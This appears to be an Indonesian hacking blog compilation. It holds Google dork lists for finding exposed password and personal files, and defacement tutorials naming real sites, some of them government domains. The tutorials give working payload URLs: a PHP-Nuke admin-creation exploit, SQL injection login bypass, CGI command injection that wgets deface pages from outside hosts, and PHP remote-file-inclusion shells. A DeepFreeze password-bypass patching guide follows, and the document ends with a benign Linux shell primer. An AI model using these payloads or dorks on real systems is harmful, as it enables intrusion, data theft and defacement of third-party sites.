eggdrop filetype:user
user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf configuration files for OpenLDAP
inurl:”wvdial.conf” intext:”password” configuration files for WV Dial
ext:ini eudora.ini configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information
intext:”powered by Web Wiz Journal”
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/
“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/
intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board”
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
– dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php
Mencari Dokumen khusus ?
filetype:xls inurl:”email.xls” email.xls
files, berpotensial untuk mengambil contact information
“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs
“not for distribution”
confidential documents containing the confidential clause
buddylist.blt
AIM contacts list
intitle:index.of mystuff.xml
Trillian IM contacts list
filetype:ctt “msn”
MSN contacts list
filetype:QDF
QDF database files for the Quicken financial application
intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers
intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail
“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc. On the Net
untuk lebih kreatifnya bisa di coba coba sendiri, okeh
reference:
http://johnny.ihackstuff.com – largest repository of data on Google hacking,
http://insecure.org/nmap/ – Nmap network scanner,
http://thc.org/thc-amap/ – amap network scanner.

langkah-langkah deface

2008-01-31T01:27:00.000-08:00

Deface situs php nuke

Buka situs www.google.com

kemudian ketik =>

allinurl:.com/nuke/index.php atau

allinurl:.org/nuke/index.php.

Nah ….. kalo udah ketemu targetnya maka langkah

selanjutnya adalah :

1. www.target.com/nuke/index.php

2. www.target.com/nuke/admin.php =>

index.php yg diatas tadi dirubah

menjadi admin.php

3. Masukkan bug ini di belakang situs tadi :

?op=AddAuthor&add_aid=budakbaonk&add_name=

God&add_pwd=bajingan&add_email=

sandal_karet@yahoo.com&add_radminsuper=1&admin=

eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.target.com/nuke/admin.php?

op=AddAuthor&add_aid=budakbaonk&add_name=

God&add_pwd=bajingan&add_email=

sandal_karet@yahoo.com&add_radminsuper=1&admin=

eCcgVU5JT04gU0VMRUNUIDEvKjox

Kalo nggak mau berarti situs tsb udah di path ama admin nya.

Tapi kalo berhasil, maka di url/browsing lu muncul

www.target.com/nuke/admin.php?op=mod_author

5. Disana lu di suruh login, masukin id & password lu tadi.

Masih ingat kan ?

id=budakbaonk => liat yg diatas tadi

password=bajingan => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.

Berarti lu udah mengusai situs tsb skrg ! He he he he he

Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),

Kolom title =>

Kolom content =>

Kolom expiration => unlimited

trus klik tab add messages yg ada dibawah

Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,

misal www.target.com/nuke atau www.target.com/nuke/index.php

kalo nggak ada hasil deface lu coba klik tab refresh yg ada

diatas yg disamping url/browsing lu

========================================

Deface asp/iis dgn menggunakan win 98

1. Klik Icon “My Computer” di komputer kamu.

2. Cari Icon “Web Folder” didalam My Computer Itu.

3. Klick lagi Icon “Add web folder” dan akan muncul

“Type the location to add”.

4. Ketiklah nama situs yang akan kita deface/tambahkan filenya

misalnya http://www.52down.com. Kemudian klik Next.

5. Muncul “Enter the name for this Web Folder”, kemudian klik Finish.

kalau tidak ada “Finish” nya atau “Error” artinya tidak bisa dideface

jadi kamu musti cari target lain.

6. Apabila sudah berhasil, kembali lagi ke Web Folder, disana kita lihat

ada file http://www.52down.com. Klik file situs tsb.

7. Buka file “Hacked.html” kamu tadi (kalo belum ada file html,

lu buat dulu file html di ms.fronpage trus simpan di kompi lu)

terus copy kemudian kembali lagi ke file http://www.52down.com,

paste kan file “Test.html” tadi. Kalau tidak bisa di paste kan artinya

udah dipath sama adminnya, jadi kamu musti cari target lain.

8. Apabila sudah berhasil, kita lihat hasilnya di url/browsing

misalnya http://www.52down.com/Test.html

9. Kalau mau mencari target caranya cari di www.google.com terus

ketik allinurl:.com/index.asp atau allinurl:.org/default.asp

tinggal kreatifitas kamu mencari target.

Atau bisa cari target di http://www.zone-h.org/en/defacements/

klik mirror yg sebelah kanan (yg windows 2000),

Perhatikan target nya => Defacer: Infektion Group

Domain : www.namatarget.com << ini target nya

=======================================

cara membuat html :

Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds,

trus pilih enable hyperlink, trus pilih color background,

pilih warna hitam, trus ok

Trus pilih tab center yg diatas (rata tengah) kayak ms.word,

ukuran huruf pilih no.5 (18pt), trus pilih font color (yg gambar A),

pilih warna merah, kalo udah tulis Hacked by nama nick kamu,

tekan enter 3 kali Trus ketik

Hey Admin……..do you a need help ? trus enter sekali,

trus tulis Matrix.Dal.Net - #surabayahack, trus enter 3 kali

Kalo kalo mau pake gambar pilih tab insert diatas, trus pilih pictures,

trus pilih from file…., di file name ketik

http://www.finagro.gov.co/902.gif atau cari file jpg/gif di pc lu

trus ok Kalo mau pake musik pilih tab format diatas,

trus pilih backgrounds trus pilih tab general,

pada “background sound location” ketik

http://www.indonesia.go.id/berkibar.mid atau cari file midi di pc lu

trus ok Utk nyimpan nya pilih tab file diatas, pilih save as…

file name : Hacked atau nama nick kamu, trus ok

Catatan : seandainya waktu lu nyimpan file ada keluar

“save embedded file” pilih “set action” trus pilih “dont save” trus ok

Utk meliat hasilnya pilih tab preview dibagian bawah.

=======================================

Deface guestbook (buku tamu)

Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook

(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak

semua guestbook bisa dideface.

Langkah2 nya

I. Cari target guestbook di www.google.co.id dgn mengetikkan

site:my guestbook.php atau site:com bukutamu.php

II. Kalo udah dapat target nya, misalnya www.namatarget.my/guestbook.php

maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg tersedia.

Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli,

cukup identitas palsu aja.

contoh :

Nama : boneka lucu

Email : boneka_2005@yahoo.com

Website : www.boneka-lucu.com

Asal : toko boneka

Komentar :

Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara

SQL Injection ke guestbook tsb, disitu kita akan memasukkan

sebuah gambar (jgn gambar porno ya ? nggak boleh lho ?

ntar dimarah mama). Trus klik tombol “submit” atau tombol apa

namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus

ketik target tadi www.namatarget.my/guestbook.php

Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing

lu. Nah…muncul deh gambar yg kita masukin tadi di guestbook tsb.

Berarti guestbook tsb bisa dideface.

Catatan :

Kalo nggak ada gambarnya, yg ada hanya tulisan

berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong !

cari target yg lain.

III. Kalo udah muncul gambar yg kita masukkan tadi,

buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia.

contoh :

Nama : deface

Email : deface_2005@yahoo.com

Website : www.deface.com

Asal : dunia maya

komentar :

Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.

Catatan :

Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya sesuai

keinginan lu.

IV. Klik tombol “submit” atau tombol apa namanya yg ada di guestbook tsb.

Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php

Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing lu.

Nah…muncul deh hasil deface kita di guestbook tsb.

======================================

deface asp dgn sql injection

1. buka browsing/url www.google.co.id

2. ketik site:go.id login.asp

misal nya kita dapat target www.namatarget.com/login.asp

3. username dan pass ketik ‘or”=’

4. buka satu persatu file yg ada disana

5. cari file yg bisa kita ubah/deface

6. buka browsing/url baru trus ketikkan target tadi misal nya www.namatarget.com

7. kalo hasil nya belum ada, klik tab refresh disamping url lu

======================================

deface cgi

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<< file aslinya

tambahin |pwd| diujungnya

|pwd| <<< perintah/bug utk linux/unix

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|pwd|

yg keluar di web target adalah /home/sites/site52/users/wolfsecu/web/coartcds/Web_store

ok......lanjut

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /home/sites/site52/users/wolfsecu/web/jh.htm|

kasih jarak 1 spasi wget dgn situs lu

-O << ini huruf -O besar, bukan angka nol

cara liat nya => https://bronte.netpresence.com.au/~wolfsecu/arai.html

…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< perhatikan baik2

.../home/sites/site52/users/wolfsecu/web/jh.htm <<< perhatikan baik2

.../coartcds/Web_store <<< musti dibuang

cara cari target => allinurl.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N

target nya musti file html diujung nya kalo mau tambahin |pwd|

=======================================

deface cgi II

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id|

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd|

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack” > /usr/home/web/users/a0004481/html/adspro/jh.html|

http://www.sports-media.org/adspro/jh.html

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm << file asli

|id| <<<<<<<<<<<<<<< utk meliat user yg ada diserver tsb

|pwd| <<<<<<<<<<<<< utk meliat file yg ada diserver tsb

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd| >>>>>>> usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro

usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< perhatikan baik2

usr/home/web/users/a0004481/html/adspro/jh.html <<<<<<<< perhatikan baik2

cgi-bin/adspro <<<<<<< dibuang

liat file index.html => http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|

http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack”>decae.html|&cart_id=9721374.5730

http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo%20

======================================

deface php dgn injection

http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4

itu file aslinya

modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

itu bug nya

http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?

jadi index.php?name=PNphpBB2&file=index&c=4 dibuang

cara inject nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?

dikotak command unix masukin

wget http://geocities.com/nusantarajaya_2004/arai.html

cara liat nya http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html

http://www.narnia-chroniken.de <<< halaman depan di deface

http://www.narnia-chroniken.de/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/sandal_karet/script/arai2.jpg?

ketik : pwd

cd /homepages/7/d117874362/htdocs;wget file deface

========================================

deface php dgn injection II

http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.php

itu file aslinya

http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?

dikotak masukin: pwd

jadi pics%2Fom%2Findex.php dibuang

cara inject nya http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?

dikotak masukin: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html

cara liat nya http://www.giphted.com/arai.html

=========================================

deface phpbb/forum

http://www.bpmpt.go.id/forum/index.php

itu file aslinya

includes/db.php?phpbb_root_path=

itu bug nya

jadi index.php dibuang

http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?

dikotak masukin: pwd

Kalo keluar “Hacking attempt” artinya dipath

Tapi kalo berhasil, terserah lu mau di apain……

==========================================

deface phpbb/forum II

http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12

itu file aslinya

&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd

itu bug nya

cara inject nya http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd

cara wget nya ada 3 cara :

1.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html;ls

2.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm

3.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=lwp-download%20http://geocities.com/nusantarajaya_2004/arai.html;ls

biasa nya cara ke 3 yg berhasil.

cara liat nya http://singapore.bluejackings.net/arai.html

=========================================

cara liat fs tanpa login

http://www.friendster.com/useropen.php?uid=

<<<<<< masukin nomor id nya

===========================================

deface php dgn injection III

langsung di tembak aja bos biar ga lama2

www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?

kolo berhasil seperti biasa

cmd sql php injection

buat nyari akses ke foldernya

cmd => find / -perm 777 -type d

klo foldernya permision denied berarti kita ga bisa apa2 di folder itu

cari folder yg ga ada tulisan perm

ambil contoh ini

http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?

cari akses foldernya [commndnya diatas]

cmd => find / -perm 777 -type d

bakal makan B/w

jd sabar aja

=== contoh -perm denied ==

find: /mnt/drive2/lost+found: Permission denied

find: /proc/tty/driver: Permission denied

find: /proc/1/task/1/fd: Permission denied

itu artinya no akses

kita cari yg lain

tp usahakan foldernya yg /var/www/

klo ga ada juga gpp

ada yg lain

/home/httpd/vhosts/hdca.org/httpdocs/downloads => contoh folder yg bisa

cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar OSnya]

[command dasar OSnya] => wget, dir, cat, rm, rv -rf dll

skarang kita wget

cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html

coba lo masukin

ke cmdnya

———————————————————

–10:35:01– http://www.geocities.com/nusantarajaya_2004/arai.html

=> `arai.html’

Resolving www.geocities.com… 66.218.77.68

Connecting to www.geocities.com[66.218.77.68]:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 6,021 [text/html]

0K ….. 100% 98.21 KB/s

10:35:02 (98.21 KB/s) - `arai.html’ saved [6,021/6,021]

———————————————————

itu artinya sukses ke save

karena httpdocs

gampang cara liatnya

/home/httpd/vhosts/hdca.org/httpdocs/downloads => www.hdca.org/downloads/[file deface lo]

contoh www.hdca.org/downloads/arai.html

selsai deh

gampang kan

http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/

http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk=

http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=id;pwd

http://img143.imageshack.us/img143/6782/hacked8lc.jpg

http://www.sobatpadi.net/download/

http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20-la

http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani

about deepfreeze

2008-01-31T01:12:00.000-08:00

Penulis tidak bertanggung jawab akan kerusakan atau kerugian yang
ditimbulkan akibat penggunaan ataupun
pelaksanaan tutorial ini. Tutorial ditujukan untuk mereka yang mau
belajar bukan untuk mereka yang ingin
merusak bahkan merugikan orang lain dengan tindakannya.Anyway, Let's
Get It on!!!!

$>DeepFreeze adalah salah satu Software yang digunakan untuk
mengamankan, mencegah dan mengontrol komputer
dari pengerusakan yang dilakukan sengaja ataupun tidak sengaja.
Sesuai dengan namanya software ini akan "Membekukan" segala yang ada di
partisi "beku"nya.
Tidak ada "Restriction" dalam penggunaan komputer yang "dibekukan",
hanya saja semua settingan, dan kondisi
komputer akan kembali seperti semula setelah komputer di-restart /
booting.
$>Tutorial ini akan membahas tentang cara Disable/Un-freeze DeepFreeze
versi 4.20.020.0598, 4.20.120.0598,
4.20.121.0613, 5.20.220.1125 dan 5.30.120.1181 pada OS Windows 2K/XP.

$>Pada umumnya DeepFreeze mempunyai aplikasi yang aktif di komputer
yang masih "Enable", dan bila kita ingin
mengubah setingan dari DeepFreeze maka harus masuk ke menu Config yang
diproteksi oleh password tentunya.
$>Ada beberapa cara untuk men-Disable software ini, yaitu dengan
menggunakan disket (bootable tentunya)
lalu boot dari disket itu dan memindahkan file DFSERVEX.EXE yang berada
di path c:\progra~1\hypert~1\deepfr~1
ke tempat lain. Dan yang terakhir yaitu dengan menggunakan Disassembler
untuk mem-Patch File Frzstate(2K).exe.
Tutorial ini akan membahas cara yang kedua.

Tools yang diperlukan :
1.Ollydbg 1.10 > http://www.ollydbg.de/
2.Process Explorer > http://www.sysinternals.com/
3.Ollyscript > http://ollyscript.apsvans.com/
4.ASPack 2.12 OEP finder script by hacnho/VCT2k4 >
http://ollyscript.apsvans.com/

Langkah-langkah :
1.Jalankan Process Explorer lalu lihat aplikasi Frzstate.exe atau
Frzstate2k.exe yang berjalan lalu klik kanan
untuk melihat propertiesnya. Catat Properties Command Linenya yang
berisi path program itu dan 3 angka terakhir.
contoh : C:\Program Files\HyperTechnologies\Deep
Freeze\_$Df\FrzState.exe 1 1066917 0 << 3 angka terakhir
2.Jalankan Ollydbg 1.10 dan buka Aplikasi Frzstate(2k).exe melalui path
yang sudah dicatat. Jangan lupa masukkan
3 angka terakhir di kolom Arguments.
3.Akan ada box peringatan yang muncul hiraukan saja, pada box
peringatan kedua kilk No.
4.Jalankan Plug-in OllyScript dengan memb-Browse-nya di menu
Options>Appearance>Plugi-in Path
5.Jalankan Script EOP di menu Plugins>Run Script>Ollyscript tentukan
path dari EOP script lalu klik Open.
6.Setelah itu script akan membuka code asli. Perhatikan apakah ada ikon
dfreeze di system tray (DFreeze dapat diset-
untuk tidak menampilkannya),bila tidak ada klik kanan pada jendela
code pilih Go to>Expression dan masukkan nilai
berikut :
versi 4.20.020.0598 > 40A2BE
versi 4.20.120.0598 > idem
versi 4.20.121.0613 > 409F4A
versi 5.20.220.1125 > 40FC4A
versi 5.30.120.1181 > idem
dan klik Ok. Setelah itu program akan menuju ke baris tersebut. Klik
kanan lagi pilih Assemble lalu isi kolom dengan
ekspresi NOP dan jangan lupa checklist pilihan Fill with NOP's lalu
klik Assemble.
7.Kembali lagi ke jendela code, klik kanan untuk memilih Go to dan isi
dengan nilai berikut :
versi 4.20.020.0598 > 40368D
versi 4.20.120.0598 > idem
versi 4.20.121.0613 > 4034F5
versi 5.20.220.1125 > 4037E9
versi 5.30.120.1181 > 4037E9
lalu kilk Ok. Program akan menuju baris tersebut. Kita akan membuat
sebuah BreakPoint disini.
8.Klik kanan pilih Breakpoint>Toogle, lalu tekan F9 untuk eksekusi
baris tersebut. Bila benar akan muncul 2 ikon
Deepfreeze pada system tray. Pilihlah salah satu ikon tersebut dan
tekan Shift+dobel klik atau ctrl+Shift+Alt+F6
untuk membuka Form Login DFreeze. Isi kolom password dengan apa saja
allu klik OK atau Enter.
9.Jika ikon yang kita pilih benar maka form Login tersebut seolah-olah
"Membeku". Kembali ke jendela code di Ollydbg
tekan F8 dan lihat jendela register di sebelah kanan, ganti isi
register EAX dengan nilai 1 (dalam hexadesimal) dengan
dobel klik di register tersebut. (nilai 000000000 merupakan value
"False" untuk pengecekan password)
10.Tekan F9 untuk eksekusi program lagi, bila benar maka kita akan
mendapatkan sebuah form Config dari DeepFreeze.

referensi :
1.http://usuarios.arnet.com.ar/fliamarconato/
2.http://webs.uolsinectis.com.ar/c_delgado/

Mempelajari Dasar-dasar Shell

2008-01-31T01:04:00.000-08:00

Dunia Linux atau umumnya keluarga unix mempunyai perbedaan jauh dibandingkan dengan system operasi lain, misalnya Microsoft Windows. Dikarenakan terbiasa dengan windows maka akan sangat sulit jika harus langsung berhadapan dengan linux. Secara teoritis sebelum menggunakan linux hal dasar yang harus di ketahui ialah istilah-istilah yang ada di Linux. Shell salah satu istilah yang umum diperbincangkan tapi banyak juga yang sampai detik ini belum mempunyai gambaran jelas, padahal shell ialah tempat konfigurasi dan menjalankan / mengoperasikan Linux.

Distro (distribusi) linux sekarang ini telah dikembangkan oleh para developer untuk membuat Linux secantik mungkin. Dengan tujuan agar linux digemari dan masyarakat mulai beralih ke sebuah babak baru; open source. Dengan menyertakan berbagai kecantikan dari window manager seperti KDE, Gnome maka banyak pemula linux yang mengabaikan keberadaan shell. Shell tidak ditujukan bagi seorang admin tapi juga bagi pengguna linux tanpa kecuali. Dibawah ini diuraikan kegunaan shell yang saya petik dari artikel I Made Wiryana (Pengantar Belajar Unix).

Kegunaan Shell

1. Pemakaian interaktif
2. Untuk mengontrol session UNIX
Contohnya: Set home directory, mail directory, startup file.
3. Pemrograman
Unix shell menyediakan sekumpulan instruksi khusus yang dapat digunakan untuk membuat program shell scripts.

Shell secara singkat seperti MS DOS milik Microsoft. Memang benar bahwa dibutuhkan hafalan-hafalan perintah jika ingin melakukan sesuatu. Contohnya proses copy file, jika ingin mengcopy file maka perlu mengetikkan perintah tertentu dan mungkin anda berfikir terlalu lama. Jika dibandingkan dengan window manager seperti KDE anda hanya dengan memainkan mouse saja.

Kalaupun merasa nyaman dengan menggunakan window manager (KDE, Gnome) maka yakinlah bahwa sesungguhnya window manager merupakan 'kepanjangan tangan' dari shell. Window manager merupakan visualisasi dari shell untuk mempermudah pengoperasian.

Contoh sederhana ialah jika menggunakan KDE untuk melihat informasi prosessor maka bisa melihatnya di control center. Tapi sebenarnya perintah tersebut merupakan visualisasi dari perintah di shell yaitu:

[syafii@sapitenk syafii]$ cat /proc/cpuinfo

Kenapa Shell?
Shell merupakan command-line intepreter artinya untuk melakukan apapun harus dengan mengetikkan baris perintah. Dennis Ritchie dan Ken Thompson (Pembuat Unix) berpendapat media apa yang harus di buat agar orang dapat 'mencoba' unix mereka. Kemudian dibuatlah shell dengan nama Bourne Shell (sh) yang dibuat oleh SR Bourne. Semenjak itu bermuncullah jenis shell yang lain yaitu C shell, Korn shell dan milik GNU sendiri yaitu Bourne Again Shell (bash), shell versi gratis. Secara default dalam Linux menggunakan bash shell. Untuk melihat tipe shell dari user ketikkan:

sintaksnya yaitu:
$grep nama_user /etc/passwd

[syafii@sapitenk syafii]$ grep syafii /etc/passwd
syafii:x:500:500::/home/syafii:/bin/bash

Panduan untuk mengetahui jenis shell.
Shell Jenis
/bin/csh atau /usr/bin/csh C shell
/bin/sh Bourne shell (bash)
/bin/rsh Restricted Bourne shell
/bin/jsh Bourne shell termasuk jobs control
/bin/ksh Korn shell
/bin/rksh Restricted Korn sh

Dari contoh diatas username syafii menggunakan shell jenis bash. Shell secara garis besar lebih power full dibandingkan dengan window manager. Yang perlu diingat karena linux ditulis dengan bahasa C dan bahasa C bersifat case sensitif yang artinya membedakan antara huruf kecil dan besar, maka perintah di shell ketik dalam huruf kecil jika diketik dalam huruf besar shell tidak akan mengenali.

Struktur Prompt di Shell

[username@hostname pwd]$

Contoh:

[syafii@sapitenk /home]$

Rumus diatas merupakan struktur prompt shell dimana username ialah nama user, hostname ialah nama host (default-nya localhost), sedangkan pwd ialah direktori sekarang (letak kursor berada), tanda $ berarti sebagai user saja, untuk root (sebutan administrator untuk keluarga unix) menggunakan tanda #.

Perintah Dasar Shell

pwd

pwd (present working directory) ialah perintah untuk melihat direktori kerja sekarang atau mudahnya untuk melihat posisi kursor sekarang.

$pwd
/home

cd (change directory)

cd digunakan untuk berpindah direktori.
Sintaknya :
cd nama_direktori

$ls
ftp httpd syafii

Untuk pindah ke direktori syafii dapat digunakan perintah

$ cd syafii

Ada trik mengenai perintah cd, ketika anda dihadapkan pada suatu kasus dimana nama direktori tersebut panjang dan jika di ketik terlalu lama dan rentan kesalahan ketik, maka cukup ketik satu atau beberapa huruf dan tekan tombol tab.

1. $ cd s # tekan tab hasilnya seperti dibawah ini
2. $ cd syafii/

Contoh diatas ingin berpindah ke direktori syafii, cukup dengan mengetikkan 'cd s' dan tekan tombol tab maka hasilnya akan seperti pada contoh kedua. Anda yang mulai menekuni dunia linux dan menginstall aplikasi under shell gunakan trik diatas.
Perintah cd digunakan untuk berpindah direktori sedangkan untuk berpindah direktori diatasnya

$pwd
/home/syafii/mail
$cd .. #naik satu tingkat direktiry diatasnya
$pwd
/home/syafii

su (subtitute user)

su digunakan untuk berpindah user (switch).

Sintaknya:

$su nama_user

Namun jika anda mengetikkan 'su' saja maka defaultnya switch ke root (administrator).

[syafii@sapitenk syafii]$ su
Password:
[root@sapitenk syafii]#

Ingat password di linux tidak ditampilkan (no-echo).

ls (List)

Perintah 'dir' pada Dos digunakan untuk melihat isi directory begitu juga dengan di shell digunakan 'ls'. Namun di shell juga di kenal perintah 'dir' yang mempunyai output yang sama dengan 'ls'.

Sintaknya:
$ls

$ls
Mail home mail mbox

Perintah di atas digunakan untuk menampilkan isi directory, seperti halnya pada windows di linux juga terdapat file hidden (nama file yang diawali dengan tanda titik berarti file hidden). Untuk menampilkan file hidden maka tambahkan atribut '-a' pada ls. Huruf 'a' berarti menampilkan semua (all) file tanpa kecuali.

Sintaknya:

$ls -a

Untuk menampilkan file lengkap dengan ukuran , waktu di-create dan hak kepemilikan tambahkan atribut '-l' (long).
$ls -l
total 16 # nilai total dicari dari jumlah file keseluruhan termasuk file hidden
drwx------ 2 syafii syafii 4096 Aug 12 22:46 Mail
drwxrwxr-x 2 syafii syafii 4096 Aug 15 08:37 home
drwx------ 2 syafii syafii 4096 Aug 12 22:44 mail
-rw------- 1 syafii syafii 1797 Aug 12 22:45 mbox

Atribut 'a' dan 'l' juga dapat digabung dengan sintak :
$ls -al

cat (Concatenate)

Perintah cat digunakan untuk melihat isi file. Layaknya perintah 'type' di dos.

Sintaksnya:

$cat nama_file

$cat test.txt
ilmu
komputer

mkdir (Make directory)

Perintah yang satu ini mempunyai fungsi yang sama dengan perintah 'md' pada DOS. Untuk membuat direktori ketik saja mkdir.

Sintaksnya:
$mkdir nama_direktori
$mkdir ilmu_komputer
$ls
Mail home mail mbox ilmu_komputer test.txt

rmdir (remove directory)

Kebalikan dari mkdir, rmdir berfungsi menghapus direktori.

Sintaksnya:
$rmdir nama_direktori
$rmdir pcplus

rm (remove)

Jika rmdir digunakan untuk menghapus direktori maka untuk menghapus (remove) file digunakan perintah rm.

Sintaksnya:
$rm nama_file
$rm test.txt

cp (copy)

Untuk mengcopy file dalam satu direktori atau antar direktori secara umum mempunyai sintaks:

$cp nama_file tujuan
$cp test.txt pcplus/

Keterangan perintah diatas yaitu file test.txt akan di copy ke direktori pcplus.

mv (move)

Membuat, menghapus file sudah anda pelajari. Sekarang perintah mv mempunyai dua makna artian yaitu:

1. 'mv' untuk memindahkan file ke direktori lain
Sintaks:
$mv nama_file direktori_tujuan
$mv test.txt pcplus

file test.txt akan dipindahkan di direktori pcplus.
2. 'mv' digunakan untuk merubah ke nama file lain (rename).
Sintaks:
$mv nama_file_lama nama_file-baru
$mv test.txt tess.txt

file test.txt akan di rename menjadi tess.txt

more

Perintah terakhir ini sama fungsinya dengan cat yaitu melihat isi file. Tapi sekarang akan ditunjukkan bagaimana menggabungkan isi dari 2 file menjadi satu tanpa menghapus masing-masing isi.

Sekarang buat dua file yaitu : coba.txt dan test.txt
$vi coba.txt
Tekan 'i' , ketikkan kalimat 'kalimat ini saya tulis dari coba.txt' , tekan tombol esc (escape) titik dua (:) lanjutkan dengan ketik wq

Kemudian ketik perintah di bawah ini untuk melihat hasilnya.

$cat coba.txt
kalimat ini saya tulis dari coba.txt

Buat lagi file yang kedua dengan nama test.txt yang isinya 'kalimat ini saya tulis dari test.txt'

$cat test.txt
kalimat ini saya tulis dari test.txt

Nah, sekarang anda sudah mempunyai dua file coba.txt dan test.txt sekarang akan dicopy isi file dari coba.txt ke dalam test.txt

kalimat ini saya tulis dari test.txt
kalimat ini saya tulis dari coba.txt

